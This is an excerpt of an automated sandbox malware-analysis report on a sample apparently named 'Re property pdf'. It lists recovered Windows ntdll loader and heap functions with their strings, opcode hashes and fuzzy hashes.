                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                              • API String ID: 0-2779062949
                                                                                                                              • Opcode ID: c6b20677ae12f68429048d9c56a13cb35b488ac582aa4cf83915972b44eb898f
                                                                                                                              • Instruction ID: 86adc2f7541c05e08650fe74728859055e81c28731c3e05ae96edbecd42a60f1
                                                                                                                              • Opcode Fuzzy Hash: c6b20677ae12f68429048d9c56a13cb35b488ac582aa4cf83915972b44eb898f
                                                                                                                              • Instruction Fuzzy Hash: 3BA18D719016299BEB71DF28CD88BEAB7F8EF44710F1041EAEA49A7250D7359E84CF50
                                                                                                                              Function 01020BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpCheckModule, xrefs: 0106A117
                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0106A10F
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0106A121
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-161242083
                                                                                                                              • Opcode ID: 975e39424949d0bc93e1fd892b0dcb13347ed7fbcaa92e82cfdf627dcef285fe
                                                                                                                              • Instruction ID: e576b43bcfe48e872a4b5c008e3ead754e61af40858ce85e6953e1208468a994
                                                                                                                              • Opcode Fuzzy Hash: 975e39424949d0bc93e1fd892b0dcb13347ed7fbcaa92e82cfdf627dcef285fe
                                                                                                                              • Instruction Fuzzy Hash: DE71D1B0A00309DFDB25EF68C981AAEB7F4FB44704F14446DE582AB655E735A941CB50
                                                                                                                              Function 01010A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-1334570610
                                                                                                                              • Opcode ID: 8c828c68bab9f5ff95beca3814cefb4f0b73894123157ac488d3a63528815b5a
                                                                                                                              • Instruction ID: f2d73d0bcbc29736667ef534651fa23931ed5c4f6c68d31707185a839b75f643
                                                                                                                              • Opcode Fuzzy Hash: 8c828c68bab9f5ff95beca3814cefb4f0b73894123157ac488d3a63528815b5a
                                                                                                                              • Instruction Fuzzy Hash: 7661BE71600305DFDB29CF28C881BAABBE5FF44704F148599F5D98B29AD7B4E881CB91
                                                                                                                              Function 0103C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 010782DE
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 010782E8
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 010782D7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1783798831
                                                                                                                              • Opcode ID: 00df9e24c94bac3a5051da32cc8177df00abf2de0f7ea6ba616952334c3d3f19
                                                                                                                              • Instruction ID: df6580f5ad2ae042d983018752947a392c897ff385902370e4a0f2d8ecadd782
                                                                                                                              • Opcode Fuzzy Hash: 00df9e24c94bac3a5051da32cc8177df00abf2de0f7ea6ba616952334c3d3f19
                                                                                                                              • Instruction Fuzzy Hash: 6B41F171544305ABE761EB28DD46B9B77E8BF88750F10492EF9C4E7290EB79D800CB91
                                                                                                                              Function 010BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • @, xrefs: 010BC1F1
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010BC1C5
                                                                                                                              • PreferredUILanguages, xrefs: 010BC212
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              • Opcode ID: 0be92f5bd61c1ab4b9b3c973df2a76b87575acba8da0fda18475de3b6fe6db10
                                                                                                                              • Instruction ID: 28da911db107063b86a50c2625918c0866277dc580dbca8d552bdfc6240d044f
                                                                                                                              • Opcode Fuzzy Hash: 0be92f5bd61c1ab4b9b3c973df2a76b87575acba8da0fda18475de3b6fe6db10
                                                                                                                              • Instruction Fuzzy Hash: 53416271E00209EBEB51DBD8C981FEEBBF9AB14700F14406AEA49F7290D7749E458B90
                                                                                                                              Function 01094144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              • Opcode ID: 2e51feafd66c792231b69b4f41a1945e2171a3bef6d6f4e42129c9e2056da704
                                                                                                                              • Instruction ID: 2cbba39bf916c403bf7f2892cadee8ed8e5144b0935300cf520498b5adab2319
                                                                                                                              • Opcode Fuzzy Hash: 2e51feafd66c792231b69b4f41a1945e2171a3bef6d6f4e42129c9e2056da704
                                                                                                                              • Instruction Fuzzy Hash: 34410371A042498BEF22DBE9CA60BADBBF5FF55340F1404A9D981EF381D7348902DB10
                                                                                                                              Function 01084755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01084899
                                                                                                                              • LdrpCheckRedirection, xrefs: 0108488F
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01084888
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-3154609507
                                                                                                                              • Opcode ID: 485174ede4be0b9bd79285c0c6817346722b7c1f2480fa8d75a7582e3ba2b532
                                                                                                                              • Instruction ID: 2eaf2d4b56a79cc4f99daf74a7f28f6b2fb10accd11fb740fc7b5534b1078ce3
                                                                                                                              • Opcode Fuzzy Hash: 485174ede4be0b9bd79285c0c6817346722b7c1f2480fa8d75a7582e3ba2b532
                                                                                                                              • Instruction Fuzzy Hash: 6041AF32A18353DBCB61FE58D840B6A7BE5BF49A50B0505ADEDC8EB355E731E800CB91
                                                                                                                              Function 01010BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-2558761708
                                                                                                                              • Opcode ID: 8ec6aaf2743b3003bb62d77a82b80eafa7a8b1abcdf7bf1ac660efed9d293147
                                                                                                                              • Instruction ID: c9cb7b1ddbb101318119636b38fb3e9d851bae101b1c6d29469643d7458c5de1
                                                                                                                              • Opcode Fuzzy Hash: 8ec6aaf2743b3003bb62d77a82b80eafa7a8b1abcdf7bf1ac660efed9d293147
                                                                                                                              • Instruction Fuzzy Hash: B111A2313151429FD769DA18CC81BBAB3A9EF40B5AF188199F5C6CB299DF38D880C751
                                                                                                                              Function 010820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrpInitializationFailure, xrefs: 010820FA
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 010820F3
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01082104
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              • Opcode ID: 55fbafcf7c26216db31ec2eae84f063bdb9d2d603a6232f31464e9573fce5a4e
                                                                                                                              • Instruction ID: 8c42b0af26b8049a9addb3bd9c7a9b04bc4961f1d40be2a1a8998c0c8bc8bd0a
                                                                                                                              • Opcode Fuzzy Hash: 55fbafcf7c26216db31ec2eae84f063bdb9d2d603a6232f31464e9573fce5a4e
                                                                                                                              • Instruction Fuzzy Hash: ECF02274640348BBEB24E60CCC43F9937ACFB40B54F2000A9F7C0AB681D6B0AA50C682
                                                                                                                              Function 010103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: #%u
                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                              • Opcode ID: f87120e10984601a866cf3b5580724873a8f5fdcf39b9700e3211de403392e24
                                                                                                                              • Instruction ID: 5513b3bd9989e56321d804a897ffe701b96f7500facddea0abce4d77c6bde0ec
                                                                                                                              • Opcode Fuzzy Hash: f87120e10984601a866cf3b5580724873a8f5fdcf39b9700e3211de403392e24
                                                                                                                              • Instruction Fuzzy Hash: 31714CB1A0014A9FDB01DFA8D990BEEB7F8FF18704F144065E985EB255EA38ED45CB60
                                                                                                                              Function 0100A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrResSearchResource Enter, xrefs: 0100AA13
                                                                                                                              • LdrResSearchResource Exit, xrefs: 0100AA25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                              • API String ID: 0-4066393604
                                                                                                                              • Opcode ID: 280a862397f633b420483f23b8d73d99b12440ef3fdd452e134c52aeece647cd
                                                                                                                              • Instruction ID: 093e71168a27aba608453b494562f941e2332d1c6e4880e619efa7158fdeb55d
                                                                                                                              • Opcode Fuzzy Hash: 280a862397f633b420483f23b8d73d99b12440ef3fdd452e134c52aeece647cd
                                                                                                                              • Instruction Fuzzy Hash: E8E16C71F00719EBFB22CB98C990BEEBBB9BF45310F144466E981EB292D7749941CB50
                                                                                                                              Function 010CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction ID: 2a86880aea22fb12b000d34216fb002884e7ae4134e905c1332661a75f92f677
                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction Fuzzy Hash: E6C17B3120434A9BE725CF28C841B6EBBE5AF94B18F088A2DF6D68B290E775D505CF51
                                                                                                                              Function 0107E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                              • Opcode ID: 7590ccf3553df2993a5b0f9b7d4d9e8c514ca9877362f11285bb56329cc48102
                                                                                                                              • Instruction ID: a4602273bac3f3ad92b417b54d12e51df850ec1178732d0c234eede9945be70b
                                                                                                                              • Opcode Fuzzy Hash: 7590ccf3553df2993a5b0f9b7d4d9e8c514ca9877362f11285bb56329cc48102
                                                                                                                              • Instruction Fuzzy Hash: D8616D71E017099FDB55DFA9C880BAEBBF5FB48700F1440ADE689EB291D731A900CB54
                                                                                                                              Function 010A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$MUI
                                                                                                                              • API String ID: 0-17815947
                                                                                                                              • Opcode ID: c9aadcd38c54d4dcc15ec613919ce0e3fe373c88579519a2fc185def00a85f88
                                                                                                                              • Instruction ID: 8a436541a39694b91cf5a96d9dcd3af73b803a267b605a25702a621e61103df9
                                                                                                                              • Opcode Fuzzy Hash: c9aadcd38c54d4dcc15ec613919ce0e3fe373c88579519a2fc185def00a85f88
                                                                                                                              • Instruction Fuzzy Hash: 3C5149B5E0021DAFDB11DFE9CC80AEEBBB8EB04754F540529EA91F7281D7709905CBA0
                                                                                                                              Function 010004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • kLsE, xrefs: 01000540
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0100063D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 0-2547482624
                                                                                                                              • Opcode ID: d087045c8ca075e413401c4e1332dbb4be0f6aa9495a7ea112c35e013303847f
                                                                                                                              • Instruction ID: 7be2dd7fd019aa7e47efefc141d402da50c702ee1afa2797beda2a83153c4b5d
                                                                                                                              • Opcode Fuzzy Hash: d087045c8ca075e413401c4e1332dbb4be0f6aa9495a7ea112c35e013303847f
                                                                                                                              • Instruction Fuzzy Hash: 2B51BE715047428BE726EF28C8407E7BBE5AF88340F10883EFADA87285E775D545CB92
                                                                                                                              Function 0100A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0100A309
                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0100A2FB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                              • API String ID: 0-2876891731
                                                                                                                              • Opcode ID: ea1f8ee48cc54f0b2c1a8fecf486640efa82cbcfc17919c5ab06f46353901ff6
                                                                                                                              • Instruction ID: dfd395b8d2da68ab1ec6770785a3c783a1b6db2e66c67c70c8fb90e9baedd59d
                                                                                                                              • Opcode Fuzzy Hash: ea1f8ee48cc54f0b2c1a8fecf486640efa82cbcfc17919c5ab06f46353901ff6
                                                                                                                              • Instruction Fuzzy Hash: D6418B30B04745DBEB129F69C840BAE7BF8FF95740F1480A5E980DB2A1E2B5D940CB51
                                                                                                                              Function 0103A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                              • Opcode ID: 57633a19ac1fc4b0cfbb76981c54f4efc8797603fef27f78cfd9b688c2d175e5
                                                                                                                              • Instruction ID: a58229ccaf1b19601da6b6d8b51af5ce499ca9ee4e9e769037f4ed8747f28872
                                                                                                                              • Opcode Fuzzy Hash: 57633a19ac1fc4b0cfbb76981c54f4efc8797603fef27f78cfd9b688c2d175e5
                                                                                                                              • Instruction Fuzzy Hash: 2201D1B2240B00EFD311DF14CD46B1677E8E788B15F058939A6C8C7590E739D804EB46
                                                                                                                              Function 0100C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MUI
                                                                                                                              • API String ID: 0-1339004836
                                                                                                                              • Opcode ID: e72e22f984e2dbf9af8832f2bc42e7df4f02daffbc5a5d8515bf643500e6a332
                                                                                                                              • Instruction ID: 0623176fa75cabd22f7911d7df67773fe847cf083878301790b7cab997bd4704
                                                                                                                              • Opcode Fuzzy Hash: e72e22f984e2dbf9af8832f2bc42e7df4f02daffbc5a5d8515bf643500e6a332
                                                                                                                              • Instruction Fuzzy Hash: 05824F75E002199FFB66CFA9C9807EDBBB1BF44310F1481A9E999AB391D7309D81CB50
                                                                                                                              Function 01086420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 01f308db07c03270dc5d6e5ff5c4ea50e3796860520e469b84475508efa27efb
                                                                                                                              • Instruction ID: 31307f17dda59d052fe7871a58fb728d4e4207f080c8964b0958352231fad3ac
                                                                                                                              • Opcode Fuzzy Hash: 01f308db07c03270dc5d6e5ff5c4ea50e3796860520e469b84475508efa27efb
                                                                                                                              • Instruction Fuzzy Hash: 2D916271A40219AFEB21EF95CD85FEE7BB8EF18B50F114065F680AB190D775AD00CBA0
                                                                                                                              Function 010AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: baab8e5f898128312c0529098fc0f0534e86cfa0ddc2f89ec6de4a8325c358c0
                                                                                                                              • Instruction ID: 3ed04875f7dd93efb6d43ac6d1c6e12b6ffa5eef9ed70d82d560048176e873a1
                                                                                                                              • Opcode Fuzzy Hash: baab8e5f898128312c0529098fc0f0534e86cfa0ddc2f89ec6de4a8325c358c0
                                                                                                                              • Instruction Fuzzy Hash: C891A072900609BFDB22ABE5DC84FEFBBB9EF85750F504029F581A7251DB359901CB90
                                                                                                                              Function 0103A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: GlobalTags
                                                                                                                              • API String ID: 0-1106856819
                                                                                                                              • Opcode ID: 1c5b24bbcad73a12e7009d3bcf77c70dd77e340ccc744364573f3001b206d145
                                                                                                                              • Instruction ID: 3eb0f29dfa928d4d16d1652a9207aba4237febb2d730ad8c9a596e4693023fda
                                                                                                                              • Opcode Fuzzy Hash: 1c5b24bbcad73a12e7009d3bcf77c70dd77e340ccc744364573f3001b206d145
                                                                                                                              • Instruction Fuzzy Hash: A2716DB5E0061ACFEF68CF99C5906EDBBF1BF48740F14816EE486A7241E7329841CB58
                                                                                                                              Function 010A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .mui
                                                                                                                              • API String ID: 0-1199573805
                                                                                                                              • Opcode ID: 9cc056a3e3ca4e990ce5fd709dc3d7e28bfda838070fb0ef689f9b0b7859c2f9
                                                                                                                              • Instruction ID: 455fd94f74468202d8458fc28d59a14fb01f671e471ae4ab4f2b9f451f6be4af
                                                                                                                              • Opcode Fuzzy Hash: 9cc056a3e3ca4e990ce5fd709dc3d7e28bfda838070fb0ef689f9b0b7859c2f9
                                                                                                                              • Instruction Fuzzy Hash: E6519476D0022A9BDB11DFD9C840AEEBBB4AF14B10F49416AE991FB240D7B49D01CBE4
                                                                                                                              Function 0101E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: EXT-
                                                                                                                              • API String ID: 0-1948896318
                                                                                                                              • Opcode ID: b5c5eead854beae4d7d8ba4d2e3f3754bc9b6649e7548d5a79dfb6ab654c7077
                                                                                                                              • Instruction ID: 8c5c58e9b590216e71c24f3cd71d019f80ca214374636bb5cc73a19ba423c346
                                                                                                                              • Opcode Fuzzy Hash: b5c5eead854beae4d7d8ba4d2e3f3754bc9b6649e7548d5a79dfb6ab654c7077
                                                                                                                              • Instruction Fuzzy Hash: 09417F72508312ABE712DA75C844BAFBBE8BF88B14F440969FAC4D7184E678D9048792
                                                                                                                              Function 0107C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryHash
                                                                                                                              • API String ID: 0-2202222882
                                                                                                                              • Opcode ID: cea54f0b43be62f71fc19363be5c1b056acb81d02dd78bd4f40c26512ff4269b
                                                                                                                              • Instruction ID: cb529173ce23252750904edd199bd509654710f0a58e74cb8ccf498c56955e99
                                                                                                                              • Opcode Fuzzy Hash: cea54f0b43be62f71fc19363be5c1b056acb81d02dd78bd4f40c26512ff4269b
                                                                                                                              • Instruction Fuzzy Hash: 2A4162F1D0052EAFEB61DB50CD84FDEB77CAB44714F0045E5AA48AB140DB709E898FA8
                                                                                                                              Function 01096B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #
                                                                                                                              • API String ID: 0-1885708031
                                                                                                                              • Opcode ID: ac6ce9b83d4e172854895efbbb40fa7cc045349f5406710eaec02f0027eab8ef
                                                                                                                              • Instruction ID: d80ea6c55c896f36dba4a92514a552ab2c2061ab84b9b48c530b28dcefd2a242
                                                                                                                              • Opcode Fuzzy Hash: ac6ce9b83d4e172854895efbbb40fa7cc045349f5406710eaec02f0027eab8ef
                                                                                                                              • Instruction Fuzzy Hash: 1D310771A0065D9BEF22DB69C860BFE7BE8DF05704F144068F991AB282D776E805DB50
